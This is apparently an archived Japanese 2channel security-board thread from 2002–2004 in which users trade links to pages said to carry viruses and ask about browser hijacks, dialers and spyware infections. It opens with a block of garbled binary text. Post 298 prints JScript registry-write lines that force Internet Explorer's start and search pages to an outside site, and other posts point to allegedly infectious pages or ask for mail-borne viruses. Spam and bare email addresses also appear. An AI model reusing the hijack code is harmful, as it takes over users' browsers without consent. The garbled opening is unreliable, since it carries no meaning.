ト・・*o'Hロホャ耆・サG・`Ct鵜ルgmサツ・ョ{h・aIキ3e[c`レオ・タ垳庭mZ・:歟/ヨ・0、
フp3刪]ハ\ヲ啾ュ肌u+WMNリヤ躪シ 捷0`w・.Qャ症レモW[Vモ-iLoヨ!蠎lィ€ニキ濕ρト
ェ忘堺-!・+pス愠jC・羽ケy・メt・9ICo・鍛ュ愑冂ェnリ・棄Z[,{簍晥@ノニ~;Iэマ6ナ
備・・K鱆サ・#e・畩;2&ルィ・<蚤・楔9+・B@"ォ'B・WbqルPLー罌闔・レFムァc3ナ#b5bjモ_
rノ・=*フ・|2Fz」飩2ト穿・%チε 蒂ォー/ィ)ェt<エエRッオx奔sョムツ9城R6Sa荢g。サ8卻
b、ェX+Eシサ﨑Wyシc衽ノ5タラ$€c-}カqュヘ珎B敢剩~%厘rイ・2・・・q揺-A賣tニ4\Tィ)%・
Δk薪-ァ=ク鷹u 1・「・ィdJ|nレミ、b稠A]。Bm)ホ・ー枌X-$簑ノ``キk )慫ヌソO・mチm;D

287:あぼーん
あぼーん
あぼーん

288:名無しさん@お腹いっぱい。
02/09/09 18:22
>>287
自分でやれ。

289:名無しさん@お腹いっぱい。
02/09/09 18:24
>>287
ホットメールにウイルス送信依頼かよ(プ

290:名無しさん@お腹いっぱい。
02/09/10 01:01
>>286
何のバイナリだたの??

291:あぼーん
あぼーん
あぼーん

292:あぼーん
あぼーん
あぼーん

293:名無しさん@お腹いっぱい。
02/09/11 02:11
(´-`).。oO(誰が何をつくれんだろう中途半端な荒らしだなぁ…)

294:名無しさん@お腹いっぱい。
02/09/11 02:41
(´-`).。oO(さりげなく私怨してる奴は何なんだろう…)

295:名無しさん@お腹いっぱい。
02/09/15 23:55
>>292
どうせ開いただけで飛んじゃう
やつとか(settimeoutでopen
させる)をソースに書くんだろ。
簡単だモンな。2.3行だよ。


296:名無しさん@お腹いっぱい。
02/09/20 08:37
URLリンク(web.cheapnet.it)
ウイルスらしいのですが

297:
02/09/20 11:02
URLリンク(www.nova.ne.jp)

298:名無しさん@お腹いっぱい。
02/09/20 13:09
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Search\\SearchAssistant", "URLリンク(www.jpneweb.net)");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Search\\CustomizeSearch", "URLリンク(www.jpneweb.net)");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Search Page","URLリンク(www.jpneweb.net)");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Start Page","URLリンク(www.jpneweb.net)");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Default_Page_URL","URLリンク(www.jpneweb.net)");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Default_Search_URL","URLリンク(www.jpneweb.net)");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Plugins\\PluginsPage","URLリンク(www.jpneweb.net)");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\SafeSites\\ie.search.msn.com","URLリンク(www.jpneweb.net)");

299:あぼーん
あぼーん
あぼーん

300:名無しさん@お腹いっぱい。
02/09/21 12:59
うわっ!このすれがそーじゃねーか!!
かかっちまった。

301:名無しさん@お腹いっぱい。
02/09/21 23:13
>>298
Shl.RegWriteでレジ書き換えか
脳トンあたまいいからなー
JSもう限界、VBSの面白いコード
作れる人いるかな、、、


302:名無しさん@お腹いっぱい。
02/09/22 22:00
次のURLが書かれたメール(一目でウィルスメールとおもえる文章内容)
がきました。ノートン入れているので安心して繋いでみることにすると、
パソコンがなにかをダウンロードしようとしていました。
下のサイトはなにのサイトでしょうか?技術を持っている人以外は
あけないようにしてください

URLリンク(210.99.218.5)

303:名無しさん@お腹いっぱい。
02/09/22 22:06
>>>302
...IEの韓国語サポートダウソになんの技術がいると?

304:名無しさん@お腹いっぱい。
02/09/22 22:22
>>303
ついていた文章はつぎのような文章だった。
ノートンがloveなんとかウィルスを検出した

Hi its me again, Lisa..... sorry my site was down, but i fixed it just for you.
I really want you to see me on my web cam live, i am usually online.
come check me out..............
-lisa
xoxo


305:名無しさん@お腹いっぱい。
02/09/22 22:25
>>304
そこ404なんだけど

306: 
02/10/03 00:17
URLリンク(205.134.182.163)

が突然ポップアップで出るようになったんだが、ネットで検索してもほとんど情報出てこない。
誰かおしえて。
ヤフーとか見てるだけで怪しいサイトに行ってない時も突然出てくる。
一時間に一度ぐらい。

307:cheshire-cat ◆CATJR.v6
02/10/03 00:50
>>306
Ad-Awareでも使ったらどうっしょか。

308: 
02/10/03 01:31
使ったんですが、これだけはどうしても発見できないんです。
エロサイトで仕込まれたのは間違いないと思われるんですが(鬱


309:cheshire-cat ◆CATJR.v6
02/10/03 01:48
>>308
Spybotとか使うって手もあると思いまするが。
何をインスコして、もしくは何をしてからそうなったんすか?

ありきたりな回答なんですが。
MeやXPならシステムの復元で、多分回復しまする。

310:308
02/10/03 14:16
Spybotでうじゃうじゃ怪しげなのが出てきました。
Ad-Awareで発見できないやつって結構多いんですね。
サンクス。

311:名無しさん@お腹いっぱい。
02/10/03 21:16
URLリンク(8506.teacup.com) ここにもよろしく

312:cheshire-cat ◆PhCATJR.v6
02/10/03 22:00
>>308
検出されたファイル名が知りたかった。。。。。

君が書き込めば、誰か新たな被害者が出た時にGoogle検索すると、このスレがヒットするのに。
もったいないなぁ。。。。。。
今度ははっきりと、「結果報告希望!」って書いてみまする。

313:名無しさん@お腹いっぱい。
02/10/04 14:08
URLリンク(www.need4xxx.net)
ソース中に警視庁

314:名無しさん@お腹いっぱい。
02/10/05 20:30
URLリンク(8112.teacup.com)

315:名無しさん@お腹いっぱい。
02/10/10 22:37
>>313って何?

316:あぼーん
あぼーん
あぼーん

317:名無しさん@お腹いっぱい。
02/10/11 18:15
URLリンク(www.zerotonin.cs.nu)
ウイルス?ガクガクブルブルです。

318:
02/10/12 06:33
>>316
警視庁にSENDMAILでいたずらメールが送信されちゃうんじゃない?

319:
02/10/14 20:30
URLリンク(www.need4xxx.net)

320:名無しさん@お腹いっぱい。
02/10/20 19:33

        エログロワッショイ!!
     \\  ブラクラワッショイ!!  //
 +   + \\ ウイルスワッショイ!!/+
                            +
.   +   /■\  /■\  /■\  +
      (Φ_Φ∩(= ゚仝゚∩ (;´~`)
 +  (( (つ   ノ(つ  丿(つ  つ ))  +
       ヽ  ( ノ ( ヽノ  ) ) )
       (_)し' し(_) (_)_)


321:あぼーん
あぼーん
あぼーん

322:あぼーん
あぼーん
あぼーん

323:名無しさん@お腹いっぱい。
02/11/23 23:35
かんせーん

324:名無しさん@お腹いっぱい。
02/12/27 04:46
携帯に感染するウイルスってあるの?
ないよね・・・
ははは・・・

325:あぼーん
あぼーん
あぼーん

326:あぼーん
あぼーん
あぼーん

327:山崎渉
03/01/15 15:51
(^^)

328:名無しさん@お腹いっぱい。
03/01/31 22:58
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
z



329:砂
03/02/01 02:41
URLリンク(jbbs.shitaraba.com)

330:注意報
03/02/08 19:05
URLリンク(free7.webdos)
ここ開いたらVBS/Redof@Mに感染!


331:cheshire-cat ◆PhCATJR.v6
03/02/08 19:14
>>330
IEが古くて、Active X全開じゃなきゃ喰らわないよん。

332:cheshire-cat ◆PhCATJR.v6
03/02/08 19:16
修正。

Java VMのバージョンに依存。

333:あぼーん
あぼーん
あぼーん

334:名無しさん@お腹いっぱい。
03/02/16 15:09
最小化のボタンが0
最大化のボタンが2
閉じるボタンが r

体験版のソフトで調べたら感染してますって出たよ
直せないから隔離してますって言われたけど、怖くなったから
感染したファイル自分で削除してしまいました

削除しても、まったく意味ないことに気づいた今日この頃
もう一度感染して、ウイルス削除ソフト使えばよいのですか?

教えてくださいお願いします


335:名無しさん@お腹いっぱい。
03/02/16 17:34
>>334
ノートンインターネットセキュリティを買う
   ↓
OSを再インストールする
   ↓
ノートンをインストールする

これが普通だと思います

336:名無しさん@お腹いっぱい。
03/02/16 22:09
>>334
マジレス欲しければ質問スレで聞け。

337:名無しさん@お腹いっぱい。
03/02/17 00:50
質問スレをのぞいてみたら同じような症状の方がいて
その方にアドバイスしている方もいました
その方法を試してみようと思います
お騒がせしました

338:名無しさん@お腹いっぱい。
03/02/17 23:50
げは!

339:マジレスお願いします
03/02/19 01:26
URLリンク(www.geocities.co.jp)
(HD全消去サイトらしいです)

ネタだと思って見たらまじでハードディスクを初期化していますという画面が出て
慌てて閉じたんですがヤバイですかね?
どうすればいいでしょうか?
とりあえずウィルスチェックはしてみたのですが特に何も見つかりませんでした。
対処法を教えてください。


340:名無しさん@お腹いっぱい。
03/02/22 01:25
>>1
聞いただけで感染するわきゃないだろが。ヴォケが!


341:名無しさん@お腹いっぱい。
03/02/22 03:48
>>339
ばかですか?
きえるわけないでしょう

342:名無しさん@お腹いっぱい。
03/02/25 23:10
もっとすげーの貼ってくれ!

343:名無しさん@お腹いっぱい。
03/02/26 15:37
>>340
(´`c_,'` )プッ

344:
03/02/26 15:40
kusosure agenna!

345:あぼーん
あぼーん
あぼーん

346:名無しさん@お腹いっぱい。
03/03/02 16:33
>>345
つーか、hotmailは受信時にウイルスチェックするし。
Klezが送信者を偽装してるんだろ。

347:名無しさん@お腹いっぱい。
03/03/02 21:03
JAVAスクリプト使ってるんですです・・
>>339


348:あぼーん
あぼーん
あぼーん

349:名無しさん@お腹いっぱい。
03/03/09 03:01
あげる罠

350:名無しさん@お腹いっぱい。
03/03/10 09:19
age

351:名無しさん@お腹いっぱい。
03/03/13 14:42
qkeng@palette.plala.or.jp

/

352:山崎渉
03/04/17 12:24
(^^)

353:山崎渉
03/04/20 06:12
   ∧_∧
  (  ^^ )< ぬるぽ(^^)

354:pona-
03/04/22 21:16
メール送るだけで発動するウイルス教えてください


355:板TOPも読めないヤシは帰れ
03/04/22 21:57
この板は、LANや個人のPCへの侵入、トロイ、ウィルス等、
様々なネット上の危険からの防御法や対策を語りあうための板です。
掲示板の荒らし方や侵入の方法、メールボムの送り方等、
攻撃方法の質問はご遠慮下さい。
2ちゃんねるでは荒らし依頼は出来ません。
また、この板ではアタック依頼は受け付けません。
攻撃依頼を見かけた方は、放置してください。
ネット犯罪の被害者になってしまった方は、まず警察にご相談下さい。

356:名無しさん@お腹いっぱい。
03/04/25 13:51
au総合情報サイト
URLリンク(boat.zero.ad.jp)

ノートン先生が反応しまくり。

357:山崎渉
03/05/28 17:15
     ∧_∧
ピュ.ー (  ^^ ) <これからも僕を応援して下さいね(^^)。
  =〔~∪ ̄ ̄〕
  = ◎―◎                      山崎渉

358:(*^ヮ^*) ◆ZERO//1HPA
03/06/01 00:29
1・ケ
1・セ
J・エ
2・チ
2・シ
?・ネ
?・その他

359:名無しさん@お腹いっぱい。
03/06/02 08:36
あのー happy99とかいてあるものをクリックしたら
画面が真っ赤になってしまいました。。
スキャンしたら検出されなかったのですが。
感染しているでしょうか。。

360:名無しさん@お腹いっぱい。
03/06/03 21:07
このサイト最悪。ウイルスに犯されてる?
URLリンク(jbbs.shitaraba.com)

361:あぼーん
あぼーん
あぼーん

362:cheshire-cat ◆CATBCJABLA
03/06/03 21:11
>>359
使ってるアンチウイルスソフトぐらいは書けば、誰かがログファイルの見方とか教えてくれる予感。

あとは関連って事で、これ。
「あるホームページを見ると、「ウイルス発見→隔離」みたいなメッセージが出る」
URLリンク(members.tripod.co.jp)

363:名無しさん@お腹いっぱい。
03/06/04 01:18
happy99.exeか?
見た事あるが・・いかにもウイルスっぽい名前じゃん。
どうしてよく分かりもしないファイルを安易に実行するのかなあ・・。
まるで何でもすぐに口に入れてしまう触覚の発達してない赤ん坊みたいだな(藁

364:名無しさん@お腹いっぱい。
03/06/08 15:13
>>360
見るだけなら無問題

365:名無しさん@お腹いっぱい。
03/06/08 20:32
URLリンク(www2.strangeworld.org)
上記urlをコピペしてブラクラチェッカーにかけようとしたらギコナビのプレビュー機能が働いちゃって
前に参照した画像がちらっと見えたと思ったらノートン先生の警告。
Js.Torojan.WindowBombだって。
まだ感染場所は検索してないけど、以前もいつ感染したかわからないウィルス(Trojanなんとか)が
あって、感染場所はギコナビフォルダとtemporaly internetfilesだった。
そのときのtempfileのurlにstrangeworldとかsahraとかいう文字列があった。
たしかノートン先生がVBSのソースが書かれているだけで警報鳴らしまくってた頃、tempofileは実
行できないから気にしなくてよいとか書いてあったような気がするので該当ファイルを削除して終わりにしたんだけど・・・
正直トロイが仕掛けられたんじゃないかと不安になる。
jpg見ただけで感染するウィルスってあるんでしょうか?

366:名無しさん@お腹いっぱい。
03/06/08 20:36
>>365
ある。

367:名無しさん@お腹いっぱい。
03/06/08 20:38
>>366
まじっすか。じゃあ早速システムスキャンを。
一時間以上かかるのでまんどくさいが。

368:名無しさん@お腹いっぱい。
03/06/08 20:42
>>367
誰も>>365のURLがそれだとは言っていない。

369:名無しさん@お腹いっぱい。
03/06/08 20:43
ちなみにこの板では鑑定はやらない。

370:名無しさん@お腹いっぱい。
03/06/08 21:22
この板では鑑定はやらないので、鑑定依頼は、
ラウンジの
勇気がなくて見られない画像解説スレ Part373
スレリンク(entrance板)l50へ。

ウィルスに関する質問は、
☆ウィルス情報&質問 総合スレッド☆part10
スレリンク(sec板)l50でどうぞ。

371:365
03/06/08 22:39
今チェック終わりました。
スレ違いスマソ。

372:名無しさん@お腹いっぱい。
03/07/06 14:46
あげ

373:名無しさん@お腹いっぱい。
03/07/06 15:12
スレのタイトルと>>1さんの発言内容が一致してないように見える
のは私だけでしょうか。

374:あぼーん
あぼーん
あぼーん

375:あぼーん
あぼーん
あぼーん

376:あぼーん
あぼーん
あぼーん

377:しぽーん
03/07/06 20:08
しぽーん

378:おぽーん
03/07/07 06:32
おぽーん

379:_
03/07/07 07:20
URLリンク(homepage.mac.com)

380:名無しさん@お腹いっぱい。
03/07/07 12:02
URLリンク(ime.nu)
焼きなす、最強だお。

381:ぴの
03/07/07 12:13
あぼーん

382:名無しさん@お腹いっぱい。
03/07/07 13:17
再起動するたびに次に立ち上げるときに必ずHPが
URLリンク(revolto.da.ru)
に設定されていてPCがクラッシュして何が原因なのかさっぱりわからないんですけど…(鬱

スパイウエアとウィルスはすべて排除してはいるんですが…

383:名無しさん@お腹いっぱい。
03/07/07 15:12
( ´_ゝ`)フーン

384:名無しさん@お腹いっぱい。
03/07/07 17:58
>>382
FWは?アンチウイルス最新定義でやってないでしょ。

385:名無しさん@お腹いっぱい。
03/07/08 00:01
URLリンク(f12.aaacafe.ne.jp)感染するよ・・・・

386:名無しさん@お腹いっぱい。
03/07/08 01:16
>>385
せめてhは消そうね。

387:名無しさん@お腹いっぱい。
03/07/08 06:20
URLリンク(www.boushi.or.jp)
これってどうなん?

388:名無しさん@お腹いっぱい。
03/07/08 07:28
やっぱミニにタコでしょ!田代本人をもりあげよう!
スーフリを上回る今年最大の祭り!!
田代まさしを、ベストジーニストにしよう!!
□ベストジーニスト賞 2003年□
現在、「田代まさし」27位。
マーシー・・・( ̄_ ̄)
◎投票結果
URLリンク(www.best-jeans.com)
◎投票フォーム(一人一回 制限)
URLリンク(www.best-jeans.com)
原則、"田代まさし"で投票。

*他のスレにコピペをよろしくお願いします
■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■
早稲田集団レイプ事件のまとめ 完全版
URLリンク(01pu_de_waseda.tripod.com)<)

389:名無しさん@お腹いっぱい。
03/07/09 07:48
URLリンク(members5.cool.ne.jp)

ここは大丈夫?


390:(;´Д`)
03/07/09 08:16
(;´Д`)おチンチンがカチカチでつ
URLリンク(homepage3.nifty.com)

391:名無しさん@お腹いっぱい。
03/07/10 14:55
 

392:_
03/07/10 15:13
URLリンク(homepage.mac.com)

393:名無しさん@お腹いっぱい。
03/07/12 14:23
URLリンク(ime.nu)

VBS_REDLOF.A

394:名無しさん@お腹いっぱい。
03/07/12 14:27
>>393
感染サイト?リンクはhとか抜いとこうよ
REDLOFってひょんといるんだよね

395:あぼーん
あぼーん
あぼーん

396:名無しさん@お腹いっぱい。
03/07/12 20:14
>>395
他人のメアドだろ?


397:山崎 渉
03/07/15 11:06

 __∧_∧_
 |(  ^^ )| <寝るぽ(^^)
 |\⌒⌒⌒\
 \ |⌒⌒⌒~|         山崎渉
   ~ ̄ ̄ ̄ ̄

398:名無しさん@お腹いっぱい。
03/07/23 01:20
 __∧_∧_
 |(  ^^ )| <ぬるぽ(^^)
 |\⌒⌒⌒\
 \ |⌒⌒⌒~|         
   ~ ̄ ̄ ̄ ̄


399:名無しさん@お腹いっぱい。
03/07/23 10:03
レベルの低い質問ですみません。
Win98、OutlookExpress5でウィルスメールを
カスタマーセンターの指示通り、転送しようとしたら
自動開封やプレビューを切ってあったにもかかわらず
開封され、KLEZ_Hに感染してしまいました。
OutlookExpress5では、転送しようとすると
開封してしまうのでしょうか?
また、開封せずに転送する方法はないのでしょうか?
どうぞよろしくお願いします。

400:名無しさん@お腹いっぱい。
03/07/23 18:42
(σ・∀・)σ400ゲッツ!!

401:名無しさん@お腹いっぱい。
03/07/23 18:47
>>399
スレリンク(sec板:651-656番)n

402:名無しさん@お腹いっぱい。
03/07/23 18:52
>>399
OEの操作云々言う前にAV入れろ。

403:名無しさん@お腹いっぱい。
03/07/25 15:35
h-y@cac-net.ne.jp

404:名無しさん@お腹いっぱい。
03/07/25 23:13
このスレをクリックする時ドキドキした。

405:名無しさん@お腹いっぱい。
03/07/25 23:19
>>404
そんなことより糞スレ上げないで

406:名無しさん@お腹いっぱい。
03/07/27 10:02
age

407:ぼるじょあ ◆yBEncckFOU
03/08/02 04:54
     ∧_∧  ∧_∧
ピュ.ー (  ・3・) (  ^^ ) <これからも僕たちを応援して下さいね(^^)。
  =〔~∪ ̄ ̄ ̄∪ ̄ ̄〕
  = ◎―――◎                      山崎渉&ぼるじょあ

408:名無しさん@お腹いっぱい。
03/08/13 04:07
軽くて使いやすいうpろだ 800MBまで
URLリンク(sekainokatasumi.ath.cx)

409:山崎 渉
03/08/15 22:37
    (⌒V⌒)
   │ ^ ^ │<これからも僕を応援して下さいね(^^)。
  ⊂|    |つ
   (_)(_)                      山崎パン

410:名無しさん@お腹いっぱい。
03/08/24 01:35
保守あげ

411:名無しさん@お腹いっぱい。
03/08/30 00:45
URLリンク(lotasproductions.com)

不正な処理でブラウザ落ちてから、デスクトップに
malware156(数字は可変)のアイコンが出来ます。
そのままでは、削除できません。
いったんOSを再起動すると、削除できます。
これって、ウイルス?

412:名無しさん@お腹いっぱい。
03/08/30 11:24
>>1ほらよ
URLリンク(mios.20m.com)

413:名無しさん@お腹いっぱい。
03/09/03 22:00
↓このページは安全ですが自己責任でクリックしてください。
URLリンク(www.viplegal.com)

414:ここは?
03/09/04 23:56
URLリンク(www.victim.com)


415:名無しさん@お腹いっぱい。
03/09/05 19:27
URLリンク(www2.strangeworld.org)
URLリンク(www2.strangeworld.org)

感染しまつた

416:名無しさん@お腹いっぱい。
03/09/07 01:51
dhfdg

417:(;´∀`)<ぬるぽ
03/09/08 10:46
URLリンク(easyweb.easynet.co.uk)
これ、そんなにすごいの?


418:名無しさん@お腹いっぱい。
03/09/09 00:29
日付変わって
昨日は開いただけでfusianasanカキコをしてしまうトラップが大流行だったようで。

419:名無しさん@お腹いっぱい。
03/09/09 19:01
URLリンク(easyweb.easynet.co.uk)


420:名無しさん@お腹いっぱい。
03/09/24 00:26
>>399
それ以前にOE使うのやめろ

421:名無しさん@お腹いっぱい。
03/10/22 23:23
URLリンク(66.7.65.90)

これとある掲示板にあって、開くつもりは本当に全く無いのに間違えて開いちゃって
PCがおかしくなりました。ウイルスなんでしょうか?
症状としては、IEをWクリすると勝手にエロサイトに接続するように設定が変わってしまい
いくら直してもPCを起動すればまたエロサイトに接続するように設定されてしまいます
↑のサイトのせいかはわかりませんが、↑のサイトを開いてPCが変になってから
ウイルスバスターの体験版をDLして検索したら、TROJ_WINTRIM.Aとかいうウイルスが大量に
見つかりました。このウイルスの駆除自体は終わったんですが、未だに強制エロサイトの
設定は改善されていません。
PCのことは初心者なので、どうか直し方を教えていただきたいのですが・・。


422:(・3・)
03/10/22 23:55
age

423:名無しさん@お腹いっぱい。
03/10/22 23:56
>>422
(・3・) アルェー ボクの顔勝手に使わないでYO

424:もう
03/10/22 23:59
421 諦めて再インストールじゃy

425:名無しさん@お腹いっぱい。
03/10/23 00:04
マルチはパソコンを窓から投げ捨てろ

426:あきお
03/10/23 00:15
417
URLリンク(easyweb.easynet.co.uk)

これ開くとどうなるの?

427:名無しさん@お腹いっぱい。
03/10/23 21:19
はじめまして。
URLリンク(www2.strangeworld.org)
は 何ですか?
友達が開いちゃって・・・
教えてください。

428:oおしえてよん
03/10/23 23:13
下記page開いたらどないなるか教えて教えてくださいませ。
URLリンク(easyweb.easynet.co.uk)
URLリンク(66.7.65.90)
URLリンク(easyweb.easynet.co.uk)
URLリンク(www2.strangeworld.org)
URLリンク(easyweb.easynet.co.uk)

429:oおしえてよん
03/10/23 23:22
ぜひ教えて下さいませ。

430:名無しさん@お腹いっぱい。
03/10/26 18:41
ブラクラ・プリクラ

431:アホ
03/10/26 18:52
私も>>422
さんと全く同じ症状です。
私が感染したのは、ちょっとURLが違うのですが、
URLリンク(66.7.65.90)
よく似ているので同じタイプのウィルスと思われます。

昨日、スレリンク(sec板)l50
のスレでも質問しましたが、
解決できないので、こちらでも質問させていただきます。
具体的には、PCいろいろな所に
「RAW SEX」というアプリケーションが勝手に作られている。
IEを起動するとエロページにアクセスされる。
「RAW SEX」を削除すると、一応インターネットが使えるようになるが、
次に起動するとまた同じ症状、という具合です。

432:名無しさん@お腹いっぱい。
03/10/26 19:31
>422 名前: (・3・) 投稿日: 03/10/22 23:55

>age

>422 名前: (・3・) 投稿日: 03/10/22 23:55

>age

>422 名前: (・3・) 投稿日: 03/10/22 23:55

>age

>422 名前: (・3・) 投稿日: 03/10/22 23:55

>age


433:名無しさん@お腹いっぱい。
03/10/26 21:26
ブラクラってなによ?

434:名無しさん@お腹いっぱい。
03/10/26 21:32
ボンクラってなによ?

435:アホ
03/10/26 22:18
431のアホですが、
>>431
のレス訂正

私も>>422
さんと全く同じ症状です。

ではなく
私も>>421
さんと全く同じ症状です。

でした。
だれかアホの俺の相談にのってください。たのんます

436:名無しさん@お腹いっぱい。
03/10/27 13:18
>>435
SPYBOT入れてスキャンしてみなされ。
なお、定義ファイルを更新しておくこと。

437:名無しさん@お腹いっぱい。
03/10/31 11:44
>>434
シマンテックのホームページでレジストリのいじり方まで教えてくれるから
行ってみれば?

438:アホ
03/10/31 11:53
了解しました

439:名無しさん@お腹いっぱい。
03/11/01 11:36
Internet Explorer開いたら、いきなりアダルトページ。
設定しなおしても、再起動するとアダルトページ。
ウイルスチェックしても1つ見つからない。絶対感染してますよね?

440:名無しさん@お腹いっぱい。
03/11/01 11:37
>>439
この辺使っとけば?
URLリンク(download.ascii.jp)

441:名無しさん@お腹いっぱい。
03/11/02 11:56
>>439
もしかしてTHE HUN'S イエローなんたらって奴ですか?

442:名無しさん@お腹いっぱい。
03/11/02 20:05
URLリンク(www.browsercleanser.com)

↑このページはどうなんでしょう??
ブラウザなんたらって事はIPが抜かれるんでしょうか・・・。
また、クリックしてしまった場合はどのようにすれば良いか。。。

何で人のPCでクリックしちゃうんだよオカン・・・_| ̄|○

443:名無しさん@お腹いっぱい。
03/11/02 20:07
鑑定依頼はラウンジの
勇気がなくて見られない画像解説スレPart470
スレリンク(entrance板)l50
でどうぞ。

444:名無しさん@お腹いっぱい。
03/11/02 20:12
>>443
画像なんですか・・・??
IPぶっこ抜きかと思いましたが移動します。
ありが㌧です。

|ノシ

445:名無しさん@お腹いっぱい。
03/11/02 21:08
>>444
画像って言うより、鑑定依頼はそっちでやってねって事。

446:広末涼子
03/11/09 16:22
URLリンク(www.yahoo.com%40195.126.71.77)

447:田代まねし
03/11/09 18:30
田代まねしが緊急新ウィルスを作りました!詳しくはここに↓
URLリンク(www.tsubakiya.info)

448:名無しさん@お腹いっぱい。
03/11/13 23:31
ウイルスの情報を一つ知りたいんですが、
ページ開いただけで感染し、勝手に接続を切られてしまい、
次から接続しようとしても接続ダイアログが出ないですぐ接続中になる。
ある程度時間たってからユーザー名とパスワードを入力するダイアログが
出てくるんで入力すると、モデムが使用中と出て繋がらない。
繋がっても接続インジケータがトレイに出てこない。
この様な症状のウイルスに感染したので、仕方なく元にもどすために
別のハードディスクにシステムをインストールしてそこから起動するという
方法をとったんですが、まだ不安なのでこのウイルスの情報がほしいです。
感染するとxtreamというプログラムが現れ、削除してもIEを起動するたび
なぜか復活してホームに常駐してしまいます。
システムの再インストールをしても同じ。
それで上記の方法をとったわけですが・・・
xtreamという名前のウイルスではないんでしょうか?
だとしたらどういう仕組みのウイルスなのか・・・
もしかしてユーザー情報を盗まれてしまって悪用されてたりしないかと思うと
不安なのです。
教えて下さい、お願い致します。



449:名無しさん@お腹いっぱい。
03/11/13 23:45
>>448
それはウイルスじゃないでしょ。ダイヤルアップ回線で、国際電話接続してぼろもうけする商売。
スパイウェア発見ソフトで駆除できる。

450:名無しさん@お腹いっぱい。
03/11/13 23:51
>>448
>システムの再インストールをしても同じ。
フォーマットしていないでしょう?
上書きか、修復インストールしたと見た。
新規にインストールすれば、そのようなことは起きない。

451:名無しさん@お腹いっぱい。
03/11/14 00:45
(・3・) アルェー ボクの顔勝手に使わないでYO

452:名無しさん@お腹いっぱい。
03/11/14 00:45
(・3・) アルェー ボクの顔勝手に使わないでYO

453:名無しさん@お腹いっぱい。
03/11/14 03:11
>>450
既に前のシステムがあったHDの方はフォーマットしています。
けど国際電話にむりやり繋げられた時間はどの位なんでしょか・・・
請求書にばかでかい金額のが書かれてたらどうしよう・・・こわいよー

454:名無しさん@お腹いっぱい。
03/11/14 03:25
>>453
パソコンに、電話線も繋いであるような環境だと、非常にまずい。
繋いでいないのなら、気にしなくていい。どうせ繋がらないのだから。
DSL環境じゃないのかな?

455:名無しさん@お腹いっぱい。
03/11/14 03:34
>>453
ちなみに請求は、接続されていた国際電話会社の方からきます。
5社全てのサービス窓口に、電話で確認した方が安心できると思いますよ。

456:名無しさん@お腹いっぱい。
03/11/14 20:26
>>453
ダイヤルアップで通信料金を支払うタイプです、常時接続じゃあない。
電話線を繋がないと通信そのものができないと思ってましたが
違うんでしょうか?

457:名無しさん@おっぱい
03/11/14 20:53
開いただけで感染かぁ。こことか。blogだけど。
URLリンク(www.blogger.com)
改造すればなんとかなりそう。

458:名無さん@お腹いっぱい。
03/11/16 09:12
お揚げさんw

459:名無しさん@お腹いっぱい。
03/11/16 10:46
>>448
MSが危険だからパッチを宛てろと繰り返しアナウンスし、メディアでも報道されているセキュリティホールを
放置していると引っかかります。この期に及んで引っかかるのは自業自得でしょう。
スレリンク(pcqa板)l50に専用スレがあります。

460:名無しさん@お腹いっぱい。
03/11/19 23:53
>>459
レスありがとうございます。
リンクに従って調べたところ、ダイアルアップチェッカーが必要ということが
わかりました。
既にスパイウェア除去ソフトをダウンロードしてるので
大丈夫だと思ったのですが、なんとそのダイアルアップチェッカーは
自分が持ってるプロパイダCD-ROMに付属で入ってたことがわかって
ぎゃふんです。
とりあえずインストールして起動してます。

461:名無しさん@お腹いっぱい。
03/11/24 20:59
URLリンク(oss.jodi.org)

462:名無しさん@お腹いっぱい。
03/12/08 15:44
URLリンク(www.geocities.co.jp)
この、わけのわからんHP逝ってリンクを適当にクリックしたら、
ウイルスに感染しましたっていう表示が出た。
ヤバイですかこれ?

463:あぼーん
あぼーん
あぼーん

464:名無しさん@お腹いっぱい。
03/12/08 18:22
hotmailでウイルス送信依頼する奴のほうが間抜けだよな。

465:あぼーん
あぼーん
あぼーん

466:名無しさん@お腹いっぱい。
03/12/08 23:48
マジレスすると、hotmailには受信時に自動でマカフィーのウイルスチェックが入る。

467:あぼーん
あぼーん
あぼーん

468:名無しさん@お腹いっぱい。
03/12/14 06:58
22

469:なおりん
03/12/28 22:52
>>421
さんと同じ症状なんですが、こうなった場合どうすればいいんですか??
ウィルスの駆除も全て終ったのに、いまだにエロサイトにとばされたり
デスクトップに勝手に居座ったりしています。
消しても消してもダメで・・・
>>431
さんのような症状にも似てるんですが
「RAW SEX」というのは出て来ませんでした

こういう事態に初めてあったので、どうすればいいのか良く分からなくて
レスとかずっと見たんですが
根本的な解決方法がよく分からなくて
誰か簡単に教えてください。。。

470:名無しさん@お腹いっぱい。
03/12/29 00:53
>>469
PC初心者板に専用スレがある。
スレリンク(pcqa板)l50

471:実験台
04/01/01 03:41
メールホストになって女と金の両方を手に入れちゃえ!
URLリンク(www.geocities.com)
成功率は結構高いからおいしい思いをすることうけあい!
